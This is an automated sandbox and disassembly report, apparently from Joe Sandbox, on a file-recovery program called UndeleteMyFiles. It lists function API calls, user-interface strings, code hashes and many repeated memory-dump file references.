Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Event$ObjectResetShowSingleWaitWindow
String ID: Are your sure you want to cancel the scan?$Warning!$h#I
API String ID: 3609912468-2439979015
Opcode ID: 0329e37a7e89a6cdaba1dbb3629170274568ae16e72f969152c2e3eedd1d9681
Instruction ID: 7fe77e097d146d7b36fdcf4c14843dbb52e2b7df2773929eb9aaf5a0b9ea3b4b
Opcode Fuzzy Hash: 0329e37a7e89a6cdaba1dbb3629170274568ae16e72f969152c2e3eedd1d9681
Instruction Fuzzy Hash: 1531AA78A00200EBE704EFA5EC59FAA77B5FB44301F2082BAF6115B2E1CBB55944CB4D

Function 00448270 Relevance: 19.6, APIs: 13, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 0040D018: _memset.LIBCMT ref: 0040D034

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 004482BD
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 004482CF
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 004482E1
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 004482F3
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00448305
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00448317
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00448329
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044833B
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044834D
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044835F
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00448371
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00448383
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00448395

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ProcessorVirtual$Concurrency::RootRoot::$_memset
String ID:
API String ID: 2430013609-0
Opcode ID: 34cfb5fd83bab9ed3ca66d08c83e463053f48e3988deadc6e31675b63d47fe4e
Instruction ID: 80cc7a78cfa7fdeae45ba0d09aed2a6c82ce54528ece6dd1ad8ff624a3071c82
Opcode Fuzzy Hash: 34cfb5fd83bab9ed3ca66d08c83e463053f48e3988deadc6e31675b63d47fe4e
Instruction Fuzzy Hash: AC315E70904299DBDB09EB98C955BBEBB70FF45308F1485ADD1123B3C2CB791A00CB69

Function 004491A0 Relevance: 19.6, APIs: 13, Instructions: 76COMMON

Download Yara Rule

APIs

~_Task_impl.LIBCPMT ref: 004491DF

Part of subcall function 0040D997: __EH_prolog3.LIBCMT ref: 0040D99E

~_Task_impl.LIBCPMT ref: 004491F1

Part of subcall function 0040BE01: __EH_prolog3.LIBCMT ref: 0040BE08

~_Task_impl.LIBCPMT ref: 00449203
~_Task_impl.LIBCPMT ref: 00449215

Part of subcall function 0040D9EC: __EH_prolog3.LIBCMT ref: 0040D9F3

~_Task_impl.LIBCPMT ref: 00449227

Part of subcall function 0040C212: __EH_prolog3.LIBCMT ref: 0040C219

~_Task_impl.LIBCPMT ref: 00449239
~_Task_impl.LIBCPMT ref: 0044924B
~_Task_impl.LIBCPMT ref: 0044925D
~_Task_impl.LIBCPMT ref: 0044926F
~_Task_impl.LIBCPMT ref: 00449281
~_Task_impl.LIBCPMT ref: 00449293
~_Task_impl.LIBCPMT ref: 004492A5
~_Task_impl.LIBCPMT ref: 004492B4

Part of subcall function 0040DAF0: __EH_prolog3.LIBCMT ref: 0040DAF7

Part of subcall function 0040CF88: __EH_prolog3.LIBCMT ref: 0040CF8F

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Task_impl$H_prolog3
String ID:
API String ID: 1204490572-0
Opcode ID: 408f64503822693c61ca89cb58de06c99a38e84c51451f37b01106cd8b301cef
Instruction ID: 03a6a145110ab96d3d623b78d82f5097d4eb7417828a800cf4457b2345033f7e
Opcode Fuzzy Hash: 408f64503822693c61ca89cb58de06c99a38e84c51451f37b01106cd8b301cef
Instruction Fuzzy Hash: 47311CB0D05189DBEF09EBD9C855BBEBB75EF41308F1445ADD1922B3C2CA791A04C72A

Function 0045F1A0 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 262stringwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041383F: EnableWindow.USER32(?,?), ref: 00413850

Part of subcall function 0041375B: IsWindow.USER32(?), ref: 0041376F

Part of subcall function 00401910: SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00401927

wsprintfW.USER32 ref: 0045F4F9
lstrlenW.KERNEL32(?), ref: 0045F532
wsprintfW.USER32 ref: 0045F572
MessageBoxW.USER32(?,?,UndeleteMyFiles,00000040), ref: 0045F592

Strings

Files selected to recover: 0, xrefs: 0045F1C9
h#I, xrefs: 0045F2EA
h#I, xrefs: 0045F443
UndeleteMyFiles, xrefs: 0045F57F
On %s %d, xrefs: 0045F55F
Total multimedia files found: %d, xrefs: 0045F4ED
h#I, xrefs: 0045F1F4

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: MessageWindowwsprintf$EnableSendlstrlen
String ID: On %s %d$Files selected to recover: 0$Total multimedia files found: %d$UndeleteMyFiles$h#I$h#I$h#I
API String ID: 3155652959-3330849741
Opcode ID: 2049b133a0f2230bf24a36539bb97eb42636a02a9b686617c89815ce47cb23bf
Instruction ID: 0b73f825b9766c9c6fd44a51a8dd9b0115d34c2228f9e0b30b31085491a5a486
Opcode Fuzzy Hash: 2049b133a0f2230bf24a36539bb97eb42636a02a9b686617c89815ce47cb23bf
Instruction Fuzzy Hash: C9D16074A00109DFCB18CF58D995BADB7B2FF88304F1482A9D9055B392D735AE46CF89

Function 00448A70 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 132stringCOMMON

Download Yara Rule

APIs

SHBrowseForFolderW.SHELL32(?), ref: 00448ADB
SHGetPathFromIDListW.SHELL32(?,?), ref: 00448AEC
lstrcmpW.KERNEL32(?,00478078), ref: 00448B0D
lstrcmpW.KERNEL32(?,00478080), ref: 00448B23
lstrcmpiW.KERNEL32(?,?), ref: 00448BB3
SHGetMalloc.SHELL32(?), ref: 00448C07

Strings

The selected folder was already specified, xrefs: 00448BC4
Error, xrefs: 00448BBF
P, xrefs: 00448AD0
The selected folder is root floder of the disk,please select disk instead., xrefs: 00448B34
Error, xrefs: 00448B2F

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: lstrcmp$BrowseFolderFromListMallocPathlstrcmpi
String ID: Error$Error$P$The selected folder is root floder of the disk,please select disk instead.$The selected folder was already specified
API String ID: 3641011650-989889080
Opcode ID: 01fb3f2f986266404c0becdaa8fdc078ad6a15b6993c6f7f7fa83d82af314440
Instruction ID: 18fd87f39015fee513533a4eaffba7599edeb24b11ef8d4c5b08ff4b4cb0ff8f
Opcode Fuzzy Hash: 01fb3f2f986266404c0becdaa8fdc078ad6a15b6993c6f7f7fa83d82af314440
Instruction Fuzzy Hash: 34511870A002189FDB15DB55CC95FDEB7B4BB4C704F1040ADE249BB280DBB9AA84CF69

Function 0044C8F0 Relevance: 18.2, APIs: 12, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,87E7D08C), ref: 0044C93E
SetLastError.KERNEL32(24000006), ref: 0044C94D
_DebugHeapAllocator.LIBCPMTD ref: 0044C9F5
SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000000), ref: 0044CA55
SetLastError.KERNEL32(24000006), ref: 0044CA64

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
